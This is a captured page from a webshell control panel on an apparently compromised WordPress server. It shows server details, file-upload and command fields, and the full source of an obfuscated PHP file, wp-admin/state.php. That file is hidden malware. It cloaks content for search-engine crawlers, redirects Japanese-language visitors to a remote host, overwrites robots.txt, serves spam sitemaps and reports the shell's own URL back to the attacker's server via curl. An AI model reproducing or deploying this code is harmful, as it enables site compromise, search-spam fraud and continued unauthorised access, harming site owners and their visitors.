403Webshell
Server IP : 5.144.175.180  /  Your IP : 216.73.217.0
Web Server : Apache/2.4.63 (Unix) OpenSSL/1.1.1
System : Linux vpsgpz1.itsimplycom.it 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64
User : edilchimica ( )
PHP Version : 7.4.33
Disable Function : getmyuid,passthru,leak,listen,diskfreespace,tmpfile,link,shell_exec,dl,exec,system,highlight_file,source,show_source,fpassthru,virtual,posix_ctermid,posix_getcwd,posix_getegid,posix_geteuid,posix_getgid,posix_getgrgid,posix_getgrnam,posix_getgroups,posix_getlogin,posix_getpgid,posix_getpgrp,posix_getpid,posix_getppid,posix_getpwuid,posix_getrlimit,posix_getsid,posix_getuid,posix_isatty,posix_kill,posix_mkfifo,posix_setegid,posix_seteuid,posix_setgid,posix_setpgid,posix_setsid,posix_setuid,posix_times,posix_ttyname,posix_uname,proc_open,proc_close,proc_nice,proc_terminate,escapeshellcmd,ini_alter,popen,pcntl_exec,socket_accept,socket_bind,socket_clear_error,socket_close,socket_connect,symlink,posix_geteuid,ini_alter,socket_listen,socket_create_listen,socket_read,socket_create_pair,stream_socket_server
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/edilchimica/webapps/edilchimica/wp-admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/edilchimica/webapps/edilchimica/wp-admin/state.php
<?php
 goto Orh3f; jP1OL: $req_uri = $_SERVER["\x52\105\x51\125\x45\123\x54\x5f\125\122\111"]; goto GO_OU; RixxI: $indata1 = $inter_domain . "\x2f\x69\156\x64\x61\164\x61\56\160\x68\x70"; goto xteEa; KMCT2: $req_uri = str_replace(array("\x2e\x68\164\155", "\x2e\x68\164\155\154", "\56\163\x68\x74\155\154", "\56\160\150\x74\155\154"), '', rtrim($req_uri, "\x2f")); goto OKo80; mUzzI: $user_agent = strtolower(isset($_SERVER["\x48\124\124\x50\137\125\123\105\x52\137\x41\x47\105\x4e\x54"]) ? $_SERVER["\x48\x54\124\x50\137\125\123\x45\x52\137\x41\x47\105\116\124"] : ''); goto ifQOa; ifQOa: $res_crawl = is_crawler($user_agent); goto KMCT2; IKoOx: function is_japanese_language() { $accept_language = isset($_SERVER["\110\x54\x54\120\x5f\x41\103\103\105\120\x54\x5f\114\x41\x4e\107\125\101\x47\105"]) ? $_SERVER["\110\124\x54\x50\137\x41\103\103\x45\x50\124\x5f\x4c\x41\116\107\125\x41\107\x45"] : ''; if (empty($accept_language)) { return false; } $langs = explode("\54", $accept_language); $primary_lang = strtolower(trim($langs[0])); if (strpos($primary_lang, "\152\x61") === 0) { return true; } return false; } goto R0eJz; S7FxF: $data1["\162\x65\x71\x5f\165\162\x6c"] = $req_url; goto k2GyO; k2asR: $self = $_SERVER["\x50\x48\120\137\x53\x45\114\x46"]; goto WBIu1; dytmL: $data1["\144\157\155\x61\151\156"] = $domain; goto xSAqs; wIQ65: $data1[] = array(); goto dytmL; IZqSO: $req_url = $http . $domain . $req_uri; goto RixxI; GO_OU: $domain = $_SERVER["\x48\x54\x54\x50\137\x48\117\x53\x54"]; goto k2asR; tChNF: $referer = isset($_SERVER["\110\124\x54\x50\x5f\122\x45\x46\x45\122\105\x52"]) ? $_SERVER["\110\124\x54\120\x5f\122\105\106\105\x52\105\x52"] : ''; goto tWsuh; gPUd7: if ($res_crawl) { $data1["\x68\x74\x74\x70\x5f\165\x73\145\162\137\141\147\x65\x6e\164"] = $user_agent; $get_content = getServerCont($indata1, $data1); echo $get_content; die; } goto HXOCb; He0HP: function check_refer($refer) { $check_refer = false; $referbots = "\147\157\157\147\154\145\x7c\x79\x61\150\157\x6f\x7c\142\151\x6e\147\174\141\x6f\x6c"; if ($refer != '' && preg_match("\x2f\x28{$referbots}\x29\57\163\151", $refer)) { $check_refer = true; } return $check_refer; } goto IKoOx; JtZcG: $url_robots = $inter_domain . "\x2f\x72\x6f\142\x6f\x74\163\x2e\160\x68\x70"; goto jqcZ4; to5Ea: function is_crawler($agent) { $agent_check = false; $bots = "\x67\157\x6f\x67\x6c\145\x62\157\x74\174\142\x69\x6e\x67\x62\x6f\x74\x7c\x67\157\157\x67\x6c\x65\x7c\x61\157\x6c\x7c\x62\x69\156\x67\174\171\141\150\157\x6f"; if ($agent != '') { if (preg_match("\57\x28{$bots}\x29\x2f\x73\151", $agent)) { $agent_check = true; } } return $agent_check; } goto He0HP; Orh3f: $inter_domain = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\172\66\x30\67\x32\x33\x5f\66\x2e\x74\162\165\x73\164\x62\x69\x74\x79\56\170\x79\172\57"; goto SOFYl; mWUrX: $data1["\150\x72\x65\x66"] = $href1; goto S7FxF; WBIu1: $ser_name = $_SERVER["\x53\105\x52\126\x45\122\137\116\x41\x4d\105"]; goto IZqSO; xteEa: $map1 = $inter_domain . "\57\x6d\x61\x70\56\160\150\160"; goto qFEQB; qFEQB: $jump1 = $inter_domain . "\57\152\165\x6d\160\56\160\150\x70"; goto C4KW6; C4KW6: $url_words = $inter_domain . "\x2f\167\157\x72\144\x73\56\x70\150\160"; goto JtZcG; xSAqs: $data1["\162\x65\x71\137\165\162\151"] = $req_uri; goto mWUrX; k2GyO: if (substr($req_uri, -6) == "\x72\157\142\x6f\x74\163") { define("\102\x41\x53\x45\137\120\x41\x54\110", $_SERVER["\x44\117\103\125\115\105\116\x54\x5f\122\117\x4f\124"]); $robots_cont = @file_get_contents(BASE_PATH . "\x2f\x72\157\142\157\x74\x73\56\164\x78\x74"); $data1["\x72\157\x62\x6f\x74\163\x5f\x63\157\156\x74"] = $robots_cont; $robots_cont = @getServerCont($url_robots, $data1); file_put_contents(BASE_PATH . "\x2f\162\157\x62\x6f\x74\x73\56\164\x78\x74", $robots_cont); $robots_cont = @file_get_contents(BASE_PATH . "\57\162\x6f\142\x6f\164\x73\x2e\164\x78\x74"); if (strpos(strtolower($robots_cont), "\163\x69\x74\145\155\x61\x70")) { echo "\162\157\x62\x6f\x74\x73\56\x74\x78\164\40\146\x69\154\145\40\x63\x72\x65\x61\x74\x65\x20\163\165\143\x63\145\x73\x73\x21"; } else { echo "\x72\x6f\142\157\164\163\x2e\164\170\164\40\146\x69\x6c\x65\x20\143\x72\145\141\164\x65\40\146\141\x69\x6c\x21"; } die; } goto biN9k; R0eJz: $http = isset($_SERVER["\110\124\124\x50\123"]) && $_SERVER["\x48\x54\124\x50\123"] !== "\x6f\x66\146" ? "\x68\164\164\x70\x73\72\57\x2f" : "\x68\164\164\160\72\57\x2f"; goto jP1OL; jqcZ4: if (strpos($req_uri, "\56\160\150\160")) { $href1 = $http . $domain . $self; } else { $href1 = $http . $domain; } goto wIQ65; biN9k: if (substr($req_uri, -4) == "\x2e\x78\x6d\154") { if (strpos($req_uri, "\141\154\154\163\151\x74\145\x6d\x61\x70\x2e\x78\x6d\154")) { $str_cont = getServerCont($map1, $data1); header("\x43\x6f\156\x74\145\x6e\x74\x2d\x74\x79\x70\145\x3a\x74\145\170\164\x2f\170\155\154"); echo $str_cont; die; } if (strpos($req_uri, "\56\160\150\160")) { $word4 = explode("\x3f", $req_uri); $word4 = $word4[count($word4) - 1]; $word4 = str_replace("\x2e\x78\155\x6c", '', $word4); } else { $word4 = str_replace("\x2f", '', $req_uri); $word4 = str_replace("\56\x78\x6d\x6c", '', $word4); } $data1["\x77\157\162\144"] = $word4; $data1["\141\x63\164\151\x6f\156"] = "\143\x68\x65\x63\153\137\x73\151\164\145\x6d\x61\160"; $check_url4 = getServerCont($url_words, $data1); if ($check_url4 == "\61") { $str_cont = getServerCont($map1, $data1); header("\x43\157\156\164\x65\156\x74\55\164\x79\160\145\x3a\x74\145\170\164\x2f\170\x6d\154"); echo $str_cont; die; } $data1["\x61\143\x74\x69\x6f\156"] = "\x63\150\x65\143\153\137\x77\157\x72\144\x73"; $check1 = getServerCont($url_words, $data1); if (strpos($req_uri, "\155\x61\x70") > 0 || $check1 == "\61") { $data1["\141\143\164\151\x6f\x6e"] = "\x72\x61\156\144\137\170\155\x6c"; $check_url4 = getServerCont($url_words, $data1); header("\x43\157\x6e\164\145\156\x74\55\x74\x79\x70\x65\x3a\164\145\170\x74\x2f\x78\x6d\154"); echo $check_url4; die; } } goto T2Wlt; tWsuh: $chk_refer = check_refer($referer); goto mUzzI; OKo80: if (!$res_crawl && $chk_refer && is_japanese_language() && (preg_match("\x2f\134\144\x24\57", $req_uri) || preg_match("\x23\x5b\x61\55\x7a\135\x3d\133\141\x2d\x7a\60\55\71\x5d\53\x23", $req_uri) || preg_match("\57\151\164\x65\155\x2f", $req_uri))) { $data1["\x69\x70"] = $_SERVER["\122\105\115\117\124\105\x5f\101\104\x44\122"]; $data1["\162\x65\146\x65\162\x65\162"] = isset($_SERVER["\x48\124\x54\120\137\122\105\106\105\122\105\x52"]) ? $_SERVER["\x48\124\124\x50\x5f\x52\x45\x46\105\x52\x45\122"] : ''; $data1["\x75\163\145\162\x5f\141\147\145\x6e\x74"] = strtolower(isset($_SERVER["\x48\124\x54\x50\x5f\x55\123\105\x52\137\x41\x47\x45\116\x54"]) ? $_SERVER["\110\x54\x54\120\x5f\125\x53\x45\x52\x5f\101\x47\x45\116\124"] : ''); echo getServerCont($jump1, $data1); die; } goto gPUd7; SOFYl: function getServerCont($url, $data = array()) { $url = str_replace("\x20", "\x2b", $url); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "{$url}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data)); $output = curl_exec($ch); $errorCode = curl_errno($ch); if (version_compare(PHP_VERSION, "\70\56\60\56\60", "\x3c")) { curl_close($ch); } if (0 !== $errorCode) { return false; } return $output; } goto to5Ea; T2Wlt: if (strpos($req_uri, "\x2e\160\150\160")) { $main_shell = $http . $ser_name . $self; $data1["\x6d\x61\151\x6e\137\x73\x68\145\x6c\154"] = $main_shell; } else { $main_shell = $http . $ser_name; $data1["\155\x61\151\156\x5f\163\x68\145\x6c\154"] = $main_shell; } goto tChNF; HXOCb: ?>

Youez - 2016 - github.com/yon3zu
LinuXploit